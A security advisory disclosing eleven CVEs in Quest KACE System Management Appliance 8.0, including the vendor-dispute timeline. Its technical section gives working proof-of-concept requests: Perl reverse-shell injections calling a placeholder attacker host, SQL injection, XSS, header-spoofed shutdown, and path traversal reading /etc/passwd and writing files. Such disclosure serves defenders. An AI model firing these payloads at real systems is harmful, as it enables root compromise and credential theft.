Quest KACE System Management Appliance 8.0 - Multiple Vulnerabilities

Quest KACE System Management Appliance Multiple Vulnerabilities

1. *Advisory Information*

Title: Quest KACE System Management Appliance Multiple Vulnerabilities
Advisory ID: CORE-2018-0004
Advisory URL:
http://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities
Date published: 2018-05-31
Date of last update: 2018-05-22
Vendors contacted: Quest Software Inc.
Release mode: Forced release

2. *Vulnerability Information*

Class: Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Improper Neutralization of Special Elements used in an OS Command
[CWE-78], Deserialization of Untrusted Data [CWE-502], Improper Privilege
Management [CWE-269], Improper Privilege Management [CWE-269], Improper
Authorization [CWE-285], Improper Neutralization of Special Elements used
in an SQL Command [CWE-89], Improper Neutralization of Special Elements
used in an SQL Command [CWE-89], Improper Neutralization of Input During
Web Page Generation [CWE-79], External Control of File Name or Path
[CWE-73], External Control of File Name or Path [CWE-73]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2018-11138, CVE-2018-11139, CVE-2018-11135, CVE-2018-11134,
CVE-2018-11132, CVE-2018-11142, CVE-2018-11136, CVE-2018-11140,
CVE-2018-11133,
CVE-2018-11137, CVE-2018-11141

3. *Vulnerability Description*

>From Quest KACE's website:

"The KACE Systems Management Appliance [1]  provides
your growing organization with comprehensive management of network-connected
devices, including servers, PCs, Macs, Chromebooks, tablets, printers,
storage, networking gear and the Internet of Things (IoT). KACE can fulfill
all of your organization's systems management needs, from initial deployment
to ongoing management and retirement."

Multiple vulnerabilities were found in the Quest KACE System Management
Virtual Appliance that would allow a remote attacker to gain command
execution as root. We present three vectors to achieve this, including
one that can be exploited as an unauthenticated user.

Additional web application vulnerabilities were found in the web console
that is bundled with the product. These vulnerabilities are detailed in
section 7.

Note: This advisory has limited details on the vulnerabilities because
during the attempted coordinated disclosure process, Quest advised us not
to distribute our original findings to the public or else they would
take legal action. Quest's definition of "responsible disclosure" can be
found at
https://support.quest.com/essentials/reporting-security-vulnerability.

CoreLabs has been publishing security advisories since 1997 and believes
in coordinated disclosure and good faith collaboration with software vendors
before disclosure to help ensure that a fix or workaround solution is ready
and available when the vulnerability details are publicized. We believe
that providing technical details about each finding is necessary to provide
users and organizations with enough information to understand the
implications
of the vulnerabilities against their environment and, most importantly, to
prioritize the remediation activities aiming at mitigating risk.

We regret Quest's posture on disclosure during the whole process (detailed
in the Report Timeline section) and the lack of a possibility of engaging
into a coordinated publication date, something we achieve (and have
achieved) with many vendors as part of our coordinated disclosure practices.

4. *Vulnerable Packages*

. Quest KACE System Management Appliance 8.0 (Build 8.0.318)
Other products and versions might be affected too, but they were not tested.

5. *Vendor Information, Solutions and Workarounds*

Quest reports that it has released the security vulnerability patch
SEC2018_20180410 to address the reported vulnerabilities.
Patch can be download at
https://support.quest.com/download-install-detail/6086148.

For more details, Quest published the following Security Note:
https://support.quest.com/kace-systems-management-appliance/kb/254193/security-vulnerability-patch-sec2018_20180410-

6. *Credits*

These vulnerabilities were discovered and researched by Leandro Barragan
and Guido Leo from Core Security Consulting Services. The publication of
this advisory was coordinated by Leandro Cuozzo from Core Advisories Team.

7. *Technical Description / Proof of Concept Code*

Quest KACE SMA ships with a web console that provides administrators and
users with several features. Multiple vulnerabilities were found in the
context of this console, both from an authenticated and unauthenticated
perspective.

Section 7.1 describes how an unauthenticated attacker could gain command
execution on the system as the web server user.

Vulnerabilities described in 7.2 and 7.3 could also be abused to gain code
execution but would require the attacker to have a valid authentication
token.

In addition, issues found in the Sudo Server module presented in 7.4 and
7.5 would allow the attacker to elevate his privileges from the web server
user to root, effectively obtaining full control of the device.

Additional web application vulnerabilities were found in the console, such
as insufficient authorization for critical functions, which would allow an
anonymous attacker to reconfigure the appliance (7.6), SQL injection
vulnerabilities (7.7, 7,8), a cross-site scripting issue (7.9), and path
traversal vulnerabilities, which would allow an attacker to read, write and
delete arbitrary files (7.9, 7.10, 7.11).

7.1. *Unauthenticated command injection*

[CVE-2018-11138]
The '/common/download_agent_installer.php' script is accessible to anonymous
users in order to download an agent for a specific platform. This behavior
can be abused to execute arbitrary commands on the system.

The script receives the following parameters via the GET method:

. platform: Indicates the platform in which the agent is going to be
installed
. serv: SHA256 hash of a fixed value that depends of each appliance
. orgid: Organization ID
. version: Version number of the agent

The last two conditions are simple to meet. The Agent versions are publicly
available within the Quest KACE site, but even if they were not, we found
that the Organization ID parameter is vulnerable to a time based SQL
injection
(refer to issue 7.7).
This would make it possible to obtain the agent version by querying the
table 'CLIENT_DISTRIBUTION' and fetching the contents of the 'VERSION'
column. The Organization ID is 1 by default, but could be obtained in the
same way as the Agent version by querying the table 'ORGANIZATION' and
the column 'ID'.

As stated above, the application uses the Organization ID and Agent
version parameters to execute commands. This means we need to find a way
to append system commands within the Organization ID, without breaking the
SQL query. If we use the comment symbol (#), we can append anything we want
without affecting the result of the query.

Preparing payload:

/-----
- platform = windows
- serv = ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c
- orgid = 1#;perl -e 'use
Socket;$i="[AttackerIP]";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash
-i");};';
- version = 8.0.152 (last agent version available for windows)
-----/

The following proof of concept executes a reverse shell:

/-----
GET
/common/download_agent_installer.php?platform=windows&serv=ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c&orgid=1%23%3bperl+-e+'use+Socket%3b$i%3d"[AttackerIP]"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">%26S")%3bopen(STDOUT,">%26S")%3bopen(STDERR,">%26S")%3bexec("/bin/sh+-i")%3b}%3b'%3b&version=8.0.152
HTTP/1.1
Host: Server
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
-----/

/-----
$ nc -lvp 8080
Listening on [0.0.0.0] (family 0, port 8080)
Connection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2,
sport 20050)
sh: can't access tty; job control turned off
$ id
uid=80(www) gid=80(www) groups=80(www)
-----/

7.2. *Authenticated command injection*

[CVE-2018-11139]
The '/common/ajax_email_connection_test.php' script used to test the
configured
SMTP server is accessible by any authenticated user and can be abused to
execute arbitrary commands on the system. This script is vulnerable to
command injection via the unsanitized user input 'TEST_SERVER' sent to the
script via POST method.

The following proof of concept executes a reverse shell:

/-----
POST /common/ajax_email_connection_test.php HTTP/1.1
Host: [ServerIP]
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 416
Cookie: [Cookie]
Connection: close

TEST_SERVER=test;perl+-e+'use+Socket%3b$i%3d"[AttackerIP]"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">%26S")%3bopen(STDOUT,">%26S")%3bopen(STDERR,">%26S")%3bexec("/bin/sh+-i")%3b}%3b';&TEST_PORT=587&[email protected]&TEST_PASSWORD=1234&TEST_OLD_PASSWORD=&QUEUE_ID=1&[email protected]&ACTION=TEST_CONNECTION_SMTP
-----/

/-----
$ nc -lvp 8080
Listening on [0.0.0.0] (family 0, port 8080)
Connection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2,
sport 20050)
sh: can't access tty; job control turned off
$ id
uid=80(www) gid=80(www) groups=80(www)
-----/

7.3. *PHP Object Injection leading to arbitrary command execution*

[CVE-2018-11135]
An authenticated user could abuse a deserialization call on the script
'/adminui/error_details.php' to inject arbitrary PHP objects.

To exploit this issue, the parameter 'ERROR_MESSAGES' needs to be an array
and meet some specific conditions in order to successfully exploit the
issue.

7.4. *Privilege escalation via password change in Sudo Server*

[CVE-2018-11134]
In order to perform actions that requires higher privileges, the application
relies on a message queue managed that runs with root privileges and only
allows a set of commands.

One of the available commands allows to change any user's password
(including root).

Assuming we are able to run commands in the server, we could abuse this
feature by changing the password of the 'kace_support' account, which
comes disabled by default but has full sudo privileges.

7.5. *Privilege escalation via command injection in Sudo Server*

[CVE-2018-11132]
As mentioned in the issue [7.4], in order to perform actions that require
higher privileges, the application relies on a message queue that runs
daemonized with root privileges and only allows a set of commands to be
executed.

A command injection vulnerability exists within this message queue which
allows us to append arbitrary commands that will be run as root.

7.6. *Insufficient Authorization for critical function*

[CVE-2018-11142]
'systemui/settings_network.php' and 'systemui/settings_patching.php'
scripts are accessible only from localhost. This restriction can be bypassed
by modifying the 'Host' and 'X_Forwarded_For' HTTP headers.

The following proof of concept abuses this vulnerability to shutdown the
server as an anonymous user:

/-----
POST /systemui/settings_network.php HTTP/1.1
Host: localhost
X-Forwarded-For: ::1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://[ServerIp]/systemui/settings_network.php
Content-Type: multipart/form-data;
boundary=---------------------------5642543667001619951434940129
Content-Length: 3418
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------5642543667001619951434940129
Content-Disposition: form-data; name="CSRF_TOKEN"
-----------------------------5642543667001619951434940129
Content-Disposition: form-data; name="$shutdown"
DoIt!
Content-Disposition: form-data; name="save"
Save
-----------------------------5642543667001619951434940129--
-----/

7.7. *Unauthenticated SQL Injection in download_agent_installer.php*

[CVE-2018-11136]
The 'orgID' parameter received by the '/common/download_agent_installer.php'
script is not sanitized, leading to SQL injection. In particular, a blind
time based type.

The following proof of concept induces a time delay:

/-----
http://[ServerIP]/common/download_agent_installer.php?platform=windows&serv=58b9e89c12f57e492df8f1d744b6ed5a4d394b454ca8a99176caba35fd13ec1f&orgid=1
AND SLEEP(10)%23;&version=8.0.152
-----/

7.8. *SQL Injection in run_report.php*

[CVE-2018-11140]
The 'reportID' parameter received by the '/common/run_report.php' script
is not sanitized, leading to SQL injection. In particular, an error based
type.

The following proof of concept retrieves the current database name:

/-----
POST /common/run_report.php HTTP/1.1
Content-Length: 161
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Host: [ServerIP]
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Connection: close
Referer: http://[ServerIP]/adminui/analysis_report_list.php?CATEGORY_ID=
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Cookie: [Cookie]

date=1516135247598&reportId=-3161+UNION+ALL+SELECT+CONCAT(0x7170706a71,IFNULL(CAST(DATABASE()+AS+CHAR),0x20),0x716a707171),NULL--+LhEx&reportName=&format=pdf
-----/

/-----
HTTP/1.1 200 OK
Date: Thu, 08 Feb 2018 21:50:21 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Access-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key,
x-kace-auth-signature, accept, origin, content-type
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS
X-KACE-Appliance: K1000
X-KACE-Host: [ServerIP]
X-KACE-Version: 8.0.318
X-KBOX-WebServer: [ServerIP]
X-KBOX-Version: 8.0.318
X-KACE-WebServer: [ServerIP]
X-UA-Compatible: IE=9,EDGE
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Content-Length: 3548
Connection: close
Content-Type: text/html; charset=utf-8

[...SNIPPED...]
<script type="text/javascript"
src="/common/js/vendor/html5.js?BUILD=318" /></script>
<![endif]--><title>Report Queued: qppjqORG1qjpqq</title><meta
http-equiv='refresh'
[...SNIPPED...]
-----/

7.9. *Unauthenticated Cross Site Scriting in run_cross_report.php*

[CVE-2018-11133]
The 'fmt' parameter of the '/common/run_cross_report.php' script is
vulnerable to cross-site scripting.

The following proof of concept demonstrates the vulnerability:

/-----
http://[ServerIP]/common/run_cross_report.php?uniqueId=366314513&id=585&org=1&fmt=xls34403')%3balert(1)%2f%2f952
-----/

7.10. *Path traversal in download_attachment.php leading to arbitrary
file read*

[CVE-2018-11137]
The 'checksum' parameter of the '/common/download_attachment.php' script can
be abused to read arbitrary files with 'www' privileges. The following proof
of concept reads the '/etc/passwd' file. No administrator privileges are
needed to execute this script.

It is worth noting that there are several interesting files that can be
read with 'www' privileges, such as all the files located in
'/kbox/bin/koneas/keys/' and '/kbox/kboxwww/include/globals.inc',
which contain plaintext passwords.

/-----
http://[ServerIP]/common/run_cross_report.php?uniqueId=366314513&id=585&org=1&fmt=xls34403')%3balert(1)%2f%2f952
-----/

The following proof of concept demonstrates the vulnerability:

/-----
GET
/common/download_attachment.php?checksum=/../../../../../../../../../../../etc/passwd&filename=
HTTP/1.1
Host: [ServerIP]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: [Cookie]
Connection: close
Upgrade-Insecure-Requests: 1

HTTP/1.1 200 OK
Date: Thu, 18 Jan 2018 17:18:19 GMT
Server: Apache
Cache-Control: must-revalidate, post-check=0, pre-check=0
Expires: -1
Pragma: public
Content-Disposition: attachment; filename=""
Content-Transfer-Encoding: Binary
Content-Description: K1000 attachment
Content-Length: 2400
Access-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key,
x-kace-auth-signature, accept, origin, content-type
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS
X-KACE-Appliance: K1000
X-KACE-Host: k10000.
X-KACE-Version: 8.0.318
X-KBOX-WebServer: k10000.
X-KBOX-Version: 8.0.318
X-KACE-WebServer: k10000.
X-UA-Compatible: IE=9,EDGE
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Connection: close
Content-Type: application/octet-stream

# $FreeBSD: releng/11.0/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $
#
root:*:0:0:Charlie &:/root:/bin/csh
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin[...SNIPPED...]
-----/

7.11. *Path traversal in advisory.php leading to arbitrary file
creation/deletion*

[CVE-2018-11141]
The 'IMAGES_JSON' and 'attachments_to_remove[]' parameters of the
'/adminui/advisory.php' script can be abused to write and delete files
respectively. The following proof of concept creates a file located at
'/kbox/kboxwww/resources/TestWrite' with the content 'Sarasa' (base64
encoded).
Files can be at any location where the 'www' user has write permissions.

File deletion could be abused to delete
'/kbox/kboxwww/systemui/reports/setup_completed.log' file. This file's
existence defines if the appliance setup wizard is shown or not.

The following proof of concept demonstrates the vulnerability:

/-----
POST /adminui/advisory.php?ID=10 HTTP/1.1
Host: [ServerIP]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://[ServerIP]/adminui/advisory.php?ID=10
Content-Type: multipart/form-data;
boundary=---------------------------2671551246366368501556269100
Content-Length: 1705
Cookie: [Cookie]
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------2671551246366368501556269100
Content-Disposition: form-data; name="CSRF_TOKEN"

99c2addf067719d6fc3ae32ded351f000af8efdd091f162baa2a34516cefecc741cb13a69c80554a9ba32908d1c683102d3455eac39bcafc8854f46a04b2044e
-----------------------------2671551246366368501556269100
Content-Disposition: form-data; name="IMAGES_JSON"

{"/../../../resources/TestWrite":"aaaaaa,VGVzdENvbnRlbnQ="}
-----------------------------2671551246366368501556269100
Content-Disposition: form-data; name="FARRAY[ID]"
[...SNIPPED...]
-----/

Taking advantage of 7.2 and 7.4 we are able to verify the file creation:

/-----
[[email protected] /kbox/kboxwww/resources]# ls -lha
total 32
drwxr-xr-x   2 www   wheel   512B Feb  9 20:40 .
drwxr-xr-x  23 root  wheel   512B Nov 14 18:29 ..
-rw-r--r--   1 www   wheel    11B Feb  9 20:40 TestWrite
-----/

#  0day.today [2018-06-01]  #